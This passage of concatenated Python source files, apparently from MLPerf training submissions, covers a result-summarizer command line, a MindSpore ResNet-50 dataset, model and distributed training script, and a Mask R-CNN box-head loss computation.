for key in sorted(rows):
print(rows[key])
def get_parser():
parser = argparse.ArgumentParser(
prog='mlperf_logging.result_summarizer',
description='Summarize a set of result files.',
)
parser.add_argument('folder', type=str,
help='the folder for a submission package')
parser.add_argument('usage', type=str,
help='the usage such as training, inference_edge, inference_server')
parser.add_argument('ruleset', type=str,
help='the ruleset such as 0.6.0, 0.7.0, or 1.0.0')
parser.add_argument('--werror', action='store_true',
help='Treat warnings as errors')
parser.add_argument('--quiet', action='store_true',
help='Suppress warnings. Does nothing if --werror is set')
return parser
def main():
parser = get_parser()
args = parser.parse_args()
if args.usage != 'training':
print('Usage {} is not supported.'.format(args.usage))
sys.exit(1)
if args.ruleset not in ['0.6.0', '0.7.0', '1.0.0']:
print('Ruleset {} is not supported.'.format(args.ruleset))
sys.exit(1)
multiple_folders_regex = r'(.*)\{(.*)\}'
multiple_folders = re.search(multiple_folders_regex, args.folder)
if multiple_folders:
# Parse results for multiple organizations.
path_prefix = multiple_folders.group(1)
path_suffix = multiple_folders.group(2)
if ',' in path_suffix:
orgs = multiple_folders.group(2).split(',')
elif '*' == path_suffix:
orgs = os.listdir(path_prefix)
orgs = [org for org in orgs
if _is_organization_folder(os.path.join(path_prefix, org))]
print('Detected organizations: {}'.format(', '.join(orgs)))
for org in orgs:
org_folder = path_prefix + org
summarize_results(org_folder, args.ruleset)
else:
# Parse results for single organization.
summarize_results(args.folder, args.ruleset)
if __name__ == '__main__':
main()
```
#### File: implementations/mindspore_close_src/dataset.py
```python
import os
import numpy as np
import mindspore.common.dtype as mstype
import mindspore.dataset.engine as de
import mindspore.dataset.vision.c_transforms as C
import mindspore.dataset.transforms.c_transforms as C2
from PIL import Image
from io import BytesIO
import warnings
warnings.filterwarnings("ignore", "(Possibly )?corrupt EXIF data", UserWarning)
def create_dataset(dataset_path,
do_train,
image_size=224,
crop_min=0.08,
repeat_num=1,
batch_size=32,
num_workers=12):
"""
create a train or eval dataset
Args:
dataset_path(string): the path of dataset.
do_train(bool): whether dataset is used for train or eval.
repeat_num(int): the repeat times of dataset. Default: 1
batch_size(int): the batch size of dataset. Default: 32
Returns:
dataset
"""
device_num = int(os.getenv("RANK_SIZE"))
rank_id = int(os.getenv('RANK_ID'))
if do_train:
ds = de.ImageFolderDataset(dataset_path, num_parallel_workers=num_workers, shuffle=True,
num_shards=device_num, shard_id=rank_id)
else:
batch_per_step = batch_size * device_num
print("eval batch per step:{}".format(batch_per_step))
if batch_per_step < 50000:
if 50000 % batch_per_step == 0:
num_padded = 0
else:
num_padded = batch_per_step - (50000 % batch_per_step)
else:
num_padded = batch_per_step - 50000
print("eval padded samples:{}".format(num_padded))
if num_padded != 0:
white_io = BytesIO()
Image.new('RGB',(224,224),(255,255,255)).save(white_io, 'JPEG')
padded_sample = {
"image": np.array(bytearray(white_io.getvalue()), dtype="uint8"),
"label": np.array(-1, np.int32)
}
sample = [padded_sample for x in range(num_padded)]
ds_pad = de.PaddedDataset(sample)
ds_imagefolder = de.ImageFolderDataset(dataset_path, num_parallel_workers=num_workers)
ds = ds_pad + ds_imagefolder
distributeSampler = de.DistributedSampler(num_shards=device_num, shard_id=rank_id, shuffle=False, num_samples=None)
ds.use_sampler(distributeSampler)
else:
ds = de.ImageFolderDataset(dataset_path, num_parallel_workers=num_workers, shuffle=False, num_shards=device_num, shard_id=rank_id)
mean = [0.485*255, 0.456*255, 0.406*255]
std = [0.229*255, 0.224*255, 0.225*255]
# define map operations
if do_train:
trans = [
C.RandomCropDecodeResize(image_size, scale=(crop_min, 1.0), ratio=(0.75, 1.333)),
C.RandomHorizontalFlip(prob=0.5),
C.Normalize(mean=mean, std=std),
C.HWC2CHW(),
C2.TypeCast(mstype.float16)
]
else:
trans = [
C.Decode(),
C.Resize(256),
C.CenterCrop(image_size),
C.Normalize(mean=mean, std=std),
C.HWC2CHW()
]
type_cast_op = C2.TypeCast(mstype.int32)
# apply dataset repeat operation
ds = ds.repeat(repeat_num)
ds = ds.map(input_columns="image", num_parallel_workers=num_workers, operations=trans)
ds = ds.map(input_columns="label", num_parallel_workers=num_workers, operations=type_cast_op)
ds = ds.batch(batch_size, drop_remainder=True)
return ds
```
#### File: implementations/mindspore_close_src/resnet.py
```python
import numpy as np
from functools import partial
import mindspore.nn as nn
import mindspore.common.dtype as mstype
from mindspore.ops import operations as P
from mindspore.common.tensor import Tensor
from scipy.stats import truncnorm
from mindspore.nn import GlobalBatchNorm
from mindspore.common.initializer import HeUniform, HeNormal, XavierUniform
def _conv_variance_scaling_initializer(in_channel, out_channel, kernel_size):
fan_in = in_channel * kernel_size * kernel_size
scale = 1.0
scale /= max(1., fan_in)
stddev = (scale**0.5) / .87962566103423978
mu, sigma = 0, stddev
weight = truncnorm(-2, 2, loc=mu, scale=sigma).rvs(out_channel * in_channel * kernel_size * kernel_size)
weight = np.reshape(weight, (out_channel, in_channel, kernel_size, kernel_size))
return Tensor(weight, dtype=mstype.float32)
class LayerBuilder(object):
def __init__(self, conv_init_mode='truncnorm', bn_init_mode='adv_bn_init',
syncbn_idxs=(), syncbn_group_size=2):
assert conv_init_mode in ['truncnorm', 'HeUniform', 'XavierUniform', 'HeNormal']
assert bn_init_mode in ['adv_bn_init', 'conv_bn_init']
# conv
self.conv_init_mode = conv_init_mode
# batchnorm
self.bn_init_mode = bn_init_mode
self.bn_eps = 1e-5
self.bn_momentum = 0.9
def conv2d(self, in_channel, out_channel, kernel, stride=1):
if self.conv_init_mode == 'truncnorm':
weight = _conv_variance_scaling_initializer(in_channel, out_channel, kernel_size=kernel)
elif self.conv_init_mode == 'HeNormal':
weight = HeNormal(mode='fan_out', nonlinearity='relu')
elif self.conv_init_mode == 'HeUniform':
weight = 'HeUniform'
elif self.conv_init_mode == 'XavierUniform':
raise NotImplementedError
conv_op = nn.Conv2d(in_channel, out_channel, kernel_size=kernel, stride=stride,
padding=0, pad_mode='same', weight_init=weight)
return conv_op
def batchnorm2d(self, channel, is_last=False):
gamma_init = 0 if is_last and self.bn_init_mode == 'adv_bn_init' else 1
bn_op = nn.BatchNorm2d(channel, eps=self.bn_eps, momentum=self.bn_momentum,
gamma_init=gamma_init, beta_init=0, moving_mean_init=0, moving_var_init=1)
return bn_op
def fc(self, in_channel, out_channel):
weight = np.random.normal(loc=0, scale=0.01, size=out_channel * in_channel)
weight = Tensor(np.reshape(weight, (out_channel, in_channel)), dtype=mstype.float32)
fc_op = nn.Dense(in_channel, out_channel, has_bias=True, weight_init=weight, bias_init=0)
return fc_op
class ResidualBlock(nn.Cell):
"""
ResNet V1 residual block definition.
Args:
in_channel (int): Input channel.
out_channel (int): Output channel.
stride (int): Stride size for the first convolutional layer. Default: 1.
Returns:
Tensor, output tensor.
Examples:
>>> ResidualBlock(3, 256, stride=2)
"""
expansion = 4
def __init__(self,
builder,
in_channel,
out_channel,
stride=1):
super(ResidualBlock, self).__init__()
channel = out_channel // self.expansion
self.conv1 = builder.conv2d(in_channel, channel, 1, stride=1)
self.bn1 = builder.batchnorm2d(channel)
self.conv2 = builder.conv2d(channel, channel, 3, stride=stride)
self.bn2 = builder.batchnorm2d(channel)
self.conv3 = builder.conv2d(channel, out_channel, 1, stride=1)
self.bn3 = builder.batchnorm2d(out_channel, is_last=True)
self.relu = nn.ReLU()
self.down_sample = False
if stride != 1 or in_channel != out_channel:
self.down_sample = True
self.down_sample_layer = None
if self.down_sample:
self.down_sample_layer = nn.SequentialCell([
builder.conv2d(in_channel, out_channel, 1, stride),
builder.batchnorm2d(out_channel)])
self.add = P.Add()
def construct(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.down_sample:
identity = self.down_sample_layer(identity)
out = self.add(out, identity)
out = self.relu(out)
return out
class ResNet(nn.Cell):
"""
ResNet architecture.
Args:
block (Cell): Block for network.
layer_nums (list): Numbers of block in different layers.
in_channels (list): Input channel in each layer.
out_channels (list): Output channel in each layer.
strides (list): Stride size in each layer.
num_classes (int): The number of classes that the training images are belonging to.
Returns:
Tensor, output tensor.
Examples:
>>> ResNet(ResidualBlock,
>>> [3, 4, 6, 3],
>>> [64, 256, 512, 1024],
>>> [256, 512, 1024, 2048],
>>> [1, 2, 2, 2],
>>> 10)
"""
def __init__(self,
block,
layer_nums,
in_channels,
out_channels,
strides,
num_classes,
conv_init_mode='truncnorm',
bn_init_mode='adv_bn_init'):
self.builder = LayerBuilder(conv_init_mode=conv_init_mode,
bn_init_mode=bn_init_mode)
super(ResNet, self).__init__()
if not len(layer_nums) == len(in_channels) == len(out_channels) == 4:
raise ValueError("the length of layer_num, in_channels, out_channels list must be 4!")
self.conv1 = self.builder.conv2d(3, 64, 7, stride=2)
self.bn1 = self.builder.batchnorm2d(64)
self.relu = P.ReLU()
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, pad_mode="same")
self.layer1 = self._make_layer(block,
layer_nums[0],
in_channel=in_channels[0],
out_channel=out_channels[0],
stride=strides[0])
self.layer2 = self._make_layer(block,
layer_nums[1],
in_channel=in_channels[1],
out_channel=out_channels[1],
stride=strides[1])
self.layer3 = self._make_layer(block,
layer_nums[2],
in_channel=in_channels[2],
out_channel=out_channels[2],
stride=strides[2])
self.layer4 = self._make_layer(block,
layer_nums[3],
in_channel=in_channels[3],
out_channel=out_channels[3],
stride=strides[3])
self.mean = P.ReduceMean(keep_dims=True)
self.flatten = nn.Flatten()
self.end_point = self.builder.fc(out_channels[3], num_classes)
def _make_layer(self, block, layer_num, in_channel, out_channel, stride):
"""
Make stage network of ResNet.
Args:
block (Cell): Resnet block.
layer_num (int): Layer number.
in_channel (int): Input channel.
out_channel (int): Output channel.
stride (int): Stride size for the first convolutional layer.
Returns:
SequentialCell, the output layer.
Examples:
>>> _make_layer(ResidualBlock, 3, 128, 256, 2)
"""
layers = []
resnet_block = block(self.builder, in_channel, out_channel, stride=stride)
layers.append(resnet_block)
for _ in range(1, layer_num):
resnet_block = block(self.builder, out_channel, out_channel, stride=1)
layers.append(resnet_block)
return nn.SequentialCell(layers)
def construct(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
c1 = self.maxpool(x)
c2 = self.layer1(c1)
c3 = self.layer2(c2)
c4 = self.layer3(c3)
c5 = self.layer4(c4)
out = self.mean(c5, (2, 3))
out = self.flatten(out)
out = self.end_point(out)
return out
def resnet50(backbone='resnet50',
class_num=10,
conv_init_mode='truncnorm',
bn_init_mode='adv_bn_init'):
"""
Get ResNet50 neural network.
Args:
class_num (int): Class number.
Returns:
Cell, cell instance of ResNet50 neural network.
Examples:
>>> net = resnet50(10)
"""
return ResNet(ResidualBlock,
[3, 4, 6, 3],
[64, 256, 512, 1024],
[256, 512, 1024, 2048],
[1, 2, 2, 2],
class_num,
conv_init_mode=conv_init_mode,
bn_init_mode=bn_init_mode)
```
#### File: implementations/mindspore_close_src/train.py
```python
import os
import argparse
import numpy as np
import time
from mindspore import context
from mindspore import Tensor
from mindspore.nn.optim import LARS, Momentum
from mindspore.train.model import Model, ParallelMode
from mindspore.train.loss_scale_manager import FixedLossScaleManager
from mindspore.communication.management import init
import mindspore.dataset as ds
import mindspore.dataset.engine as de
from mlperf_logging import mllog
from dataset import create_dataset
from lr_generator import get_lr
from resnet import resnet50
from metric import DistAccuracy, ClassifyCorrectCell
from callback import StateMonitor
from cross_entropy import CrossEntropySmooth
from cfg_parser import merge_args
import moxing as mox
os.environ['MINDSPORE_HCCL_CONFIG_PATH'] = os.getenv('RANK_TABLE_FILE')
device_id = int(os.getenv('DEVICE_ID')) # 0 ~ 7
local_rank = int(os.getenv('RANK_ID')) # local_rank
device_num = int(os.getenv('RANK_SIZE')) # world_size
log_filename = os.path.join(os.getcwd(), "resnet50_rank"+ str(local_rank) +".log")
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend", save_graphs=False)
context.set_context(device_id=device_id)
def parse_args():
parser = argparse.ArgumentParser(description='Image classification')
# cloud
parser.add_argument('--data_url', type=str, default=None, help='data_url')
parser.add_argument('--train_url', type=str, default='./', help='train_url')
# train datasets
parser.add_argument('--dataset_path', type=str, default='/opt/npu/datasets/imagenet/train', help='Dataset path')
parser.add_argument('--train_image_size', type=int, default=224, help='train_image_size')
parser.add_argument('--crop_min', type=float, default=0.08, help='Dataset path')
parser.add_argument('--batch_size', type=int, default=16, help='batch_size')
parser.add_argument('--train_num_workers', type=int, default=12, help='train_num_workers')
# eval datasets
parser.add_argument('--eval_path', type=str, default='/opt/npu/datasets/imagenet/val', help='Eval dataset path')
parser.add_argument('--eval_image_size', type=int, default=224, help='eval_image_size')
parser.add_argument('--eval_batch_size', type=int, default=16, help='eval_batch_size')
parser.add_argument('--eval_interval', type=int, default=4, help='eval_interval')
parser.add_argument('--eval_offset', type=int, default=-1, help='1 means 4*n+1 epochs')
parser.add_argument('--eval_num_workers', type=int, default=12, help='eval_num_workers')
# network
parser.add_argument('--backbone', type=str, default='resnet50', help='resnet50')
parser.add_argument('--class_num', type=int, default=1001, help='class_num')
parser.add_argument('--conv_init_mode', type=str, default='truncnorm', help='truncnorm/HeNormal/HeUniform')
parser.add_argument('--bn_init_mode', type=str, default='adv_bn_init', help='adv_bn_init/conv_bn_init')
# lr
parser.add_argument('--lr_decay_mode', type=str, default='poly', help='lr_decay_mode')
parser.add_argument('--poly_power', type=float, default=2, help='lars_opt_learning_rate_decay_poly_power')
parser.add_argument('--lr_init', type=float, default=0.0, help='lr_init')
parser.add_argument('--lr_max', type=float, default=0.8, help='lr_max')
parser.add_argument('--lr_min', type=float, default=0.0, help='lr_min')
parser.add_argument('--max_epoch', type=int, default=33, help='max_epoch')
parser.add_argument('--warmup_epochs', type=float, default=1, help='warmup_epochs')
# optimizer
parser.add_argument('--momentum', type=float, default=0.9, help='momentum')
parser.add_argument('--weight_decay', type=float, default=5e-5, help='weight_decay')
parser.add_argument('--use_nesterov', type=int, default=0, help='use_nesterov')
parser.add_argument('--use_lars', type=int, default=0, help='use_lars')
parser.add_argument('--lars_epsilon', type=float, default=0.0, help='lars_epsilon')
parser.add_argument('--lars_coefficient', type=float, default=0.001, help='lars_coefficient')
# loss
parser.add_argument('--loss_scale', type=int, default=1024, help='loss_scale')
parser.add_argument('--use_label_smooth', type=int, default=1, help='use_label_smooth')
parser.add_argument('--label_smooth_factor', type=float, default=0.1, help='label_smooth_factor')
# args_yml_fn
parser.add_argument('--args_yml_fn', type=str, default='', help='args_yml_fn')
# seed
parser.add_argument('--seed', type=int, default=1, help='seed')
# gradient_accumulation_steps, set to '1' for resnet
parser.add_argument('--gradient_accumulation_steps', type=int, default=1, help='gradient_accumulation_steps')
args = parser.parse_args()
args = merge_args(args, args.args_yml_fn)
args.use_nesterov = (args.use_nesterov == 1)
args.weight_decay = float(args.weight_decay)
if args.eval_offset < 0:
args.eval_offset = args.max_epoch % args.eval_interval
args.dataset_path = "/cache_mlperf/imagenet/train"
args.eval_path = "/cache_mlperf/imagenet/val"
return args
if __name__ == '__main__':
args = parse_args()
np.random.seed(args.seed)
context.set_auto_parallel_context(device_num=device_num,
parallel_mode=ParallelMode.DATA_PARALLEL,
gradients_mean=True)
# mllog
mllog.config(filename=log_filename)
mllog.config(
default_namespace="mindspore",
default_stack_offset=1,
default_clear_line=False,
root_dir=os.path.normpath(os.path.dirname(os.path.realpath(__file__))))
mllogger = mllog.get_mllogger()
# submission
mllogger.event(key=mllog.constants.SUBMISSION_BENCHMARK, value="resnet")
mllogger.event(key=mllog.constants.SUBMISSION_DIVISION, value="closed")
mllogger.event(key=mllog.constants.SUBMISSION_ORG, value="PCL & PKU")
mllogger.event(key=mllog.constants.SUBMISSION_PLATFORM, value="Ascend 910 ProA")
mllogger.event(key=mllog.constants.SUBMISSION_STATUS, value="cloud")
mllogger.event(key=mllog.constants.CACHE_CLEAR)
# init the distribute env
init()
# network
net = resnet50(backbone=args.backbone,
class_num=args.class_num,
conv_init_mode=args.conv_init_mode,
bn_init_mode=args.bn_init_mode)
# loss
if not args.use_label_smooth:
args.label_smooth_factor = 0.0
loss = CrossEntropySmooth(sparse=True,
reduction="mean",
smooth_factor=args.label_smooth_factor,
num_classes=args.class_num)
# train dataset
epoch_size = args.max_epoch
dataset = create_dataset(dataset_path=args.dataset_path,
do_train=True,
image_size=args.train_image_size,
crop_min=args.crop_min,
batch_size=args.batch_size,
num_workers=args.train_num_workers)
ds.config.set_seed(args.seed)
de.config.set_prefetch_size(64)
step_size = dataset.get_dataset_size()
args.steps_per_epoch = step_size
# evalutation dataset
eval_dataset = create_dataset(dataset_path=args.eval_path,
do_train=False,
image_size=args.eval_image_size,
batch_size=args.eval_batch_size,
num_workers=args.eval_num_workers)
eval_step_size = eval_dataset.get_dataset_size()
# evaluation network
dist_eval_network = ClassifyCorrectCell(net)
# loss scale
loss_scale = FixedLossScaleManager(args.loss_scale, drop_overflow_update=False)
# learning rate
lr_array = get_lr(global_step=0, lr_init=args.lr_init, lr_end=args.lr_min, lr_max=args.lr_max,
warmup_epochs=args.warmup_epochs, total_epochs=epoch_size, steps_per_epoch=step_size,
lr_decay_mode=args.lr_decay_mode, poly_power=args.poly_power)
lr = Tensor(lr_array)
decayed_params = []
no_decayed_params = []
for param in net.trainable_params():
if 'beta' not in param.name and 'gamma' not in param.name and 'bias' not in param.name:
decayed_params.append(param)
else:
no_decayed_params.append(param)
group_params = [{'params': decayed_params, 'weight_decay': args.weight_decay},
{'params': no_decayed_params},
{'order_params': net.trainable_params()}]
opt = Momentum(group_params, lr, args.momentum, loss_scale=args.loss_scale, use_nesterov=args.use_nesterov)
if args.use_lars:
opt = LARS(opt, epsilon=args.lars_epsilon, coefficient=args.lars_coefficient,
lars_filter=lambda x: 'beta' not in x.name and 'gamma' not in x.name and 'bias' not in x.name)
model = Model(net, loss_fn=loss, optimizer=opt, loss_scale_manager=loss_scale, amp_level="O2",
keep_batchnorm_fp32=False,
metrics={'acc': DistAccuracy(batch_size=args.eval_batch_size, device_num=device_num)},
eval_network=dist_eval_network,
total_steps=args.steps_per_epoch*args.max_epoch)
# set event
mllogger.event(key=mllog.constants.GLOBAL_BATCH_SIZE, value=args.batch_size * device_num)
mllogger.event(key="opt_name", value="lars")
mllogger.event(key="lars_opt_base_learning_rate", value=args.lr_max)
mllogger.event(key="lars_opt_end_learning_rate", value=args.lr_min)
mllogger.event(key="lars_opt_learning_rate_decay_poly_power", value=args.poly_power)
mllogger.event(key="lars_opt_learning_rate_decay_steps", value=step_size * (epoch_size - args.warmup_epochs))
mllogger.event(key="lars_epsilon", value=args.lars_epsilon)
mllogger.event(key="lars_opt_learning_rate_warmup_epochs", value=args.warmup_epochs)
mllogger.event(key="lars_opt_momentum", value=args.momentum)
mllogger.event(key="lars_opt_weight_decay", value=args.weight_decay)
mllogger.event(key="gradient_accumulation_steps", value=args.gradient_accumulation_steps)
mllogger.event(key="seed", value=args.seed)
state_cb = StateMonitor(data_size=step_size,
mllogger=mllogger,
tot_batch_size=args.batch_size * device_num,
lrs=lr_array,
model=model,
eval_dataset=eval_dataset,
eval_interval=args.eval_interval,
eval_offset=args.eval_offset)
cb = [state_cb, ]
# compile
mllogger.start(key=mllog.constants.INIT_START)
model._init(dataset, eval_dataset, sink_size=step_size, epoch=epoch_size)
mllogger.end(key=mllog.constants.INIT_STOP)
sync_path = os.path.join(args.train_url, "sync_compile")
if not mox.file.exists(sync_path):
mox.file.make_dirs(sync_path)
yml_name = os.path.splitext(os.path.split(args.args_yml_fn)[-1])[0]
s3_rank_ready_file = os.path.join(sync_path, '{}_{}.txt'.format(yml_name, local_rank))
if mox.file.exists(s3_rank_ready_file):
mox.file.remove(s3_rank_ready_file, recursive=False)
time.sleep(10)
mox.file.write(s3_rank_ready_file, '{}'.format(local_rank))
while local_rank == 0:
existed = []
all_rank_exist = True
for rank_item in range(device_num):
if rank_item not in existed:
rank_fn_item = os.path.join(sync_path, '{}_{}.txt'.format(yml_name, rank_item))
if not mox.file.exists(rank_fn_item):
print("rank_fn_item:{} is not exist".format(rank_fn_item))
all_rank_exist = False
break
else:
existed.append(rank_item)
if all_rank_exist:
break
else:
time.sleep(1)
# train and eval
mllogger.start(key=mllog.constants.RUN_START)
mllogger.event(key="train_samples", value=step_size*device_num*args.batch_size)
mllogger.event(key="eval_samples", value=eval_step_size*device_num*args.eval_batch_size)
model.train(epoch_size, dataset, callbacks=cb, sink_size=step_size, eval_interval=args.eval_interval)
mllogger.event(key=mllog.constants.RUN_STOP, metadata={"status": "success"})
# copy mllog
src = log_filename
mllog_dir = os.path.join(args.train_url, "mllog")
if not mox.file.exists(mllog_dir):
mox.file.make_dirs(mllog_dir)
dst = os.path.join(mllog_dir, "resnet50_mllog_rank_{}.log".format(local_rank))
mox.file.copy(src, dst)
```
#### File: roi_heads/box_head/loss.py
```python
import torch
from torch.nn import functional as F
from maskrcnn_benchmark.layers import smooth_l1_loss
from maskrcnn_benchmark.structures.bounding_box import BoxList
from maskrcnn_benchmark.modeling.box_coder import BoxCoder
from maskrcnn_benchmark.modeling.matcher import Matcher
from maskrcnn_benchmark.structures.boxlist_ops import boxlist_iou, boxlist_iou_batched
from maskrcnn_benchmark.modeling.balanced_positive_negative_sampler import (
BalancedPositiveNegativeSampler
)
from maskrcnn_benchmark.modeling.utils import cat
from torch.nn.utils.rnn import pad_sequence
class FastRCNNLossComputation(object):
"""
Computes the loss for Faster R-CNN.
Also supports FPN
"""
def __init__(
self,
proposal_matcher,
fg_bg_sampler,
box_coder,
cls_agnostic_bbox_reg=False
):
"""
Arguments:
proposal_matcher (Matcher)
fg_bg_sampler (BalancedPositiveNegativeSampler)
box_coder (BoxCoder)
"""
self.proposal_matcher = proposal_matcher
self.fg_bg_sampler = fg_bg_sampler
self.box_coder = box_coder
self.cls_agnostic_bbox_reg = cls_agnostic_bbox_reg
self.const0123, self.const4567 = None, None
self.syncfree = True
def match_targets_to_proposals(self, proposal, target):
match_quality_matrix = boxlist_iou(target, proposal)
matched_idxs = self.proposal_matcher(match_quality_matrix)
# Fast RCNN only need "labels" field for selecting the targets
target = target.copy_with_fields("labels")
# get the targets corresponding GT for each proposal
# NB: need to clamp the indices because we can have a single
# GT in the image, and matched_idxs can be -2, which goes
# out of bounds
matched_targets = target[matched_idxs.clamp(min=0)]
matched_targets.add_field("matched_idxs", matched_idxs)
return matched_targets
def match_targets_to_proposals_batched(self, proposal, target):
match_quality_matrix = boxlist_iou_batched(target, proposal)
matched_idxs = self.proposal_matcher(match_quality_matrix, batched=1)
# Fast RCNN only need "labels" field for selecting the targets
# how to do this for batched case?
# target = target.copy_with_fields("labels")
return matched_idxs
def prepare_targets(self, proposals, targets):
labels = []
regression_targets = []
matched_idxs = []
for proposals_per_image, targets_per_image in zip(proposals, targets):
matched_targets_per_image = self.match_targets_to_proposals(
proposals_per_image, targets_per_image
)
matched_idxs_per_image = matched_targets_per_image.get_field("matched_idxs")
labels_per_image = matched_targets_per_image.get_field("labels")
labels_per_image = labels_per_image.to(dtype=torch.int64)
# Label background (below the low threshold)
bg_inds = matched_idxs_per_image == Matcher.BELOW_LOW_THRESHOLD
labels_per_image.masked_fill_(bg_inds, 0)
# Label ignore proposals (between low and high thresholds)
ignore_inds = matched_idxs_per_image == Matcher.BETWEEN_THRESHOLDS
labels_per_image.masked_fill(ignore_inds, -1) # -1 is ignored by sampler
# compute regression targets
regression_targets_per_image = self.box_coder.encode(
matched_targets_per_image.bbox, proposals_per_image.bbox
)
labels.append(labels_per_image)
regression_targets.append(regression_targets_per_image)
matched_idxs.append(matched_idxs_per_image)
return labels, regression_targets, matched_idxs
def prepare_targets_batched(self, proposals, targets, target_labels):
num_images = proposals.size(0)
matched_idxs = self.match_targets_to_proposals_batched(proposals, targets)
img_idx = torch.arange(num_images, device = proposals.device)[:, None]
labels = target_labels[img_idx, matched_idxs.clamp(min=0)]
labels = labels.to(dtype=torch.int64)
bg_inds = matched_idxs == Matcher.BELOW_LOW_THRESHOLD
labels.masked_fill_(bg_inds, 0)
ignore_inds = matched_idxs == Matcher.BETWEEN_THRESHOLDS
labels.masked_fill_(ignore_inds, -1)
matched_targets = targets[img_idx, matched_idxs.clamp(min=0)]
regression_targets = self.box_coder.encode(
matched_targets.view(-1,4), proposals.view(-1,4)
)
return labels, regression_targets.view(num_images, -1, 4), matched_idxs
def subsample(self, proposals, targets):
"""
This method performs the positive/negative sampling, and return
the sampled proposals.
Note: this function keeps a state.
Arguments:
proposals (list[BoxList])
targets (list[BoxList])
"""
num_images = len(proposals[0])
target_boxes = pad_sequence([target.bbox for target in targets], batch_first = True, padding_value=-1)
target_labels = pad_sequence([target.get_field("labels") for target in targets], batch_first = True, padding_value = -1)
prop_boxes, prop_scores, image_sizes = proposals[0], proposals[1], proposals[2]
labels, regression_targets, matched_idxs = self.prepare_targets_batched(prop_boxes, target_boxes, target_labels)
# scores is used as a mask, -1 means box is invalid
if self.syncfree and num_images == 1:
sampled_pos_inds, sampled_neg_inds = self.fg_bg_sampler(labels, is_rpn=0, objectness=prop_scores)
device = sampled_pos_inds[0].device
import maskrcnn_benchmark.Syncfree
inds, counts = maskrcnn_benchmark.Syncfree.balanced_pos_neg_sampler_repeat(
sampled_pos_inds[0], torch.empty([0], device=device, dtype=torch.int64),
sampled_neg_inds[0], torch.empty([0], device=device, dtype=torch.int64),
self.fg_bg_sampler.batch_size_per_image,
self.fg_bg_sampler.batch_size_per_image,
True)
sampled_pos_inds_mask = (torch.arange(0,self.fg_bg_sampler.batch_size_per_image,1, device=device) < counts[0]).unsqueeze(1)
prop_boxes = prop_boxes.view(-1,4)
regression_targets = regression_targets.view(-1,4)
labels = labels.view(-1)
matched_idxs = matched_idxs.view(-1)
result_proposals = []
for i in range(num_images):
box = BoxList(prop_boxes[inds], image_size = image_sizes[i])
box.add_field("matched_idxs", matched_idxs[inds])
box.add_field("regression_targets", regression_targets[inds])
box.add_field("labels", labels[inds])
result_proposals.append(box)
self._proposals = result_proposals
return result_proposals
else:
if num_images == 1:
sampled_pos_inds, sampled_neg_inds = self.fg_bg_sampler(labels, is_rpn=0, objectness=prop_scores)
# when num_images=1, sampled pos inds only has 1 item, so avoid copy in torch.cat
with torch.cuda.nvtx.range("NZ2"):
pos_inds_per_image = [torch.nonzero(sampled_pos_inds[0]).squeeze(1)]
neg_inds_per_image = [torch.nonzero(sampled_neg_inds[0]).squeeze(1)]
else:
sampled_pos_inds, sampled_neg_inds, num_pos_samples, num_neg_samples = self.fg_bg_sampler(labels, is_rpn=0, objectness=prop_scores)
pos_inds_per_image = sampled_pos_inds.split(list(num_pos_samples))
neg_inds_per_image = sampled_neg_inds.split(list(num_neg_samples))
prop_boxes = prop_boxes.view(-1,4)
regression_targets = regression_targets.view(-1,4)
labels = labels.view(-1)
matched_idxs = matched_idxs.view(-1)
result_proposals = []
for i in range(num_images):
inds = torch.cat([pos_inds_per_image[i], neg_inds_per_image[i]])
box = BoxList(prop_boxes[inds], image_size = image_sizes[i])
box.add_field("matched_idxs", matched_idxs[inds])
box.add_field("regression_targets", regression_targets[inds])
box.add_field("labels", labels[inds])
result_proposals.append(box)
self._proposals = result_proposals
return result_proposals
def __call__(self, class_logits, box_regression):
"""
Computes the loss for Faster R-CNN.
This requires that the subsample method has been called beforehand.
Arguments:
class_logits (list[Tensor])
box_regression (list[Tensor])
Returns:
classification_loss (Tensor)
box_loss (Tensor)
"""
class_logits = cat(class_logits, dim=0)
box_regression = cat(box_regression, dim=0)
device = class_logits.device
if not hasattr(self, "_proposals"):
raise RuntimeError("subsample needs to be called before")
proposals = self._proposals
labels = cat([proposal.get_field("labels") for proposal in proposals], dim=0)
regression_targets = cat(
[proposal.get_field("regression_targets") for proposal in proposals], dim=0
)
classification_loss = F.cross_entropy(class_logits, labels)
# get indices that correspond to the regression targets for
# the corresponding ground truth labels, to be used with
# advanced indexing
with torch.cuda.nvtx.range("NZ4"):
sampled_pos_inds_subset = torch.nonzero(labels > 0).squeeze(1)
labels_pos = labels.index_select(0, sampled_pos_inds_subset)
if self.cls_agnostic_bbox_reg:
if self.const4567 is None:
self.const4567 = torch.tensor([4, 5, 6, 7], pin_memory=True).cuda(non_blocking=True)
map_inds = self.const4567
else:
with torch.cuda.nvtx.range("H2D1"):
if self.const0123 is None:
self.const0123 = torch.tensor([0, 1, 2, 3], pin_memory=True).cuda(non_blocking=True)
map_inds = 4 * labels_pos[:, None] + self.const0123
index_select_indices=((sampled_pos_inds_subset[:,None]) * box_regression.size(1) + map_inds).view(-1)
box_regression_sampled=box_regression.view(-1).index_select(0, index_select_indices).view(map_inds.shape[0],
map_inds.shape[1])
regression_targets_sampled = regression_targets.index_select(0, sampled_pos_inds_subset)
box_loss = smooth_l1_loss(
box_regression_sampled,
regression_targets_sampled,
size_average=False,
beta=1,
)
box_loss = box_loss / labels.numel()
return classification_loss, box_loss
def make_roi_box_loss_evaluator(cfg):
matcher = Matcher(
cfg.MODEL.ROI_HEADS.FG_IOU_THRESHOLD,
cfg.MODEL.ROI_HEADS.BG_IOU_THRESHOLD,
allow_low_quality_matches=False,
)
bbox_reg_weights = cfg.MODEL.ROI_HEADS.BBOX_REG_WEIGHTS
box_coder = BoxCoder(weights=bbox_reg_weights)
fg_bg_sampler = BalancedPositiveNegativeSampler(
cfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE, cfg.MODEL.ROI_HEADS.POSITIVE_FRACTION
)
cls_agnostic_bbox_reg = cfg.MODEL.CLS_AGNOSTIC_BBOX_REG
loss_evaluator = FastRCNNLossComputation(
matcher,
fg_bg_sampler,
box_coder,
cls_agnostic_bbox_reg
)
return loss_evaluator
``` |
{
"source": "jquenum/Barcodes-dataset-generator",
"score": 3
